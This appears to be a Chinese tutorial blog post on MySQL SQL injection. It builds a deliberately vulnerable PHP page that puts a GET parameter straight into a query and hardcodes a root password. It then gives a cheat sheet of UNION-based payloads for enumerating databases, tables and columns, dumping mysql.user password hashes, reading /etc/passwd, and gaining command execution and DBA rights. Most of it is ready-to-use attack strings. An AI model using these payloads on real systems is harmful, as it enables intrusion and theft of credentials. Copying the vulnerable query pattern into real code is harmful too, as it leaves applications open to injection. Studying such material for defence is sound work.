------------------[index1.php源码]------------------
<form action="index2.php" method="get">
ID:
<input type=text name="id" />
<input type=submit>
------------------[index2.php源码]------------------
<?php
$con = mysql_connect("localhost","root","fuckyou");
mysql_select_db("mytestdb", $con);
$id=$_GET["id"];
$sql="select * from testtab where id=$id";
echo $sql."<br/>";
$rst=mysql_query($sql);
$tmp=mysql_fetch_array($rst);
echo $tmp["name"];
mysql_close($con);
?>
------------------[数据库:mytestdb,表名testtab]------------------
id name
1 jack
2 Nike
3 Mery
4 Bomb
查看mysql基本信息
and 1=2 union select 1,version() ----- 查看数据库版本
and 1=2 union select 1,database() ---- 查看当前使用的数据库
and 1=2 union select 1,user() ------查看当前数据库用户
and ord(mid(user(),1,1))=114 ------ 判断用户是否为root
暴字段内容
UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名
and 1=1 union select 1,2
select * from db WHERE id= x and 1=1 Union select 1,2,3,4,5----------------
暴字段位置
and 1=2 union select 1,2
select * from db WHERE id= x and 1=2 Union select 1,2,3,4,5----------------
暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
暴操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
and 1=2 union select 1,load_file(0x433a5c78616d70705c6874646f63735c696e6465782e68746d6c) --- C:\boot.ini
建议熟悉Mysql 默认数据库information_schema 中的表
[information_schema.SCHEMATA] -------SCHEMA_NAME 所有数据库名
[information_schema.TABLES] -------TABLE_NAME 所有表名
-------TABLE_SCHEMA 数据库名
[information_schema.COLUMNS] -------COLUMN_NAME 所有字段名
-------TABLE_SCHEMA 数据库名
[查询所有库] --------select SCHEMA_NAME from information_schema.SCHEMATA;
[查询所有表] --------select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES;
[查询所有字段]--------select COLUMN_NAME from information_schema.COLUMNS WHERE TABLE_NAME = 0x75736572
暴库
(mysql>5.0,5.0 以后的版本才有information_schema, information_schema,存储着mysql 的所有数据库和表结构信息
and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 ---- 第一个数据库
and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1 ---- 第二个数据库
and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 2,2 ---- 第三个数据库
and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 3,3 ---- 第四个数据库
and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 4,4 ---- 第五个数据库
暴出所有库:
and 1=2 union select 1,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
暴表
and 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=数据库名(十六进制) limit 0,1
and 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6d7973716c limit 0,1
and 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6d7973716c limit 1,1
and 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6d7973716c limit 2,2
and 1=2 union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x6d7973716c limit 3,3
暴出所有表
and 1=2 union select 1,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x6d7973716c
暴字段
and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=表明(十六进制) limit 0,1
and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x75736572 limit 0,1
and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x75736572 limit 1,1
and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x75736572 limit 2,2
and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x75736572 limit 3,3
暴Mysql数据库user表
and 1=2 union select 1,group_concat(Host,User,Password) from mysql.user
| Version | SELECT @@version |
| Comments | SELECT 1; #comment SELECT /*comment*/1; |
| Current User | SELECT user(); SELECT system_user(); |
| List Users | SELECT user FROM mysql.user; — priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; — priv |
| Password Cracker | John the Ripper will crack MySQL password hashes. |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
| List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv |
| Current Database | SELECT database() |
| List Databases | SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’ |
| Select Nth Row | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
| ASCII Value -> Char | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii(‘A’); # returns 65 |
| Casting | SELECT cast(’1′ AS unsigned integer); SELECT cast(’123′ AS char); |
| String Concatenation | SELECT CONCAT(‘A’,'B’); #returns AB SELECT CONCAT(‘A’,'B’,'C’); # returns ABC |
| If Statement | SELECT if(1=1,’foo’,'bar’); — returns ‘foo’ |
| Case Statement | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A |
| Avoiding Quotes | SELECT 0×414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Impossible? |
| Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
| Local File Access | …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system |
| Hostname, IP Address | SELECT @@hostname; |
| Create Users | CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv |
| Delete Users | DROP USER test1; — priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0) mysql |
----[推荐]---------------------------------------------
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://sqlzoo.net/wiki/Main_Page
http://resources.infosecinstitute.com/sql-injections-introduction/
4095
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
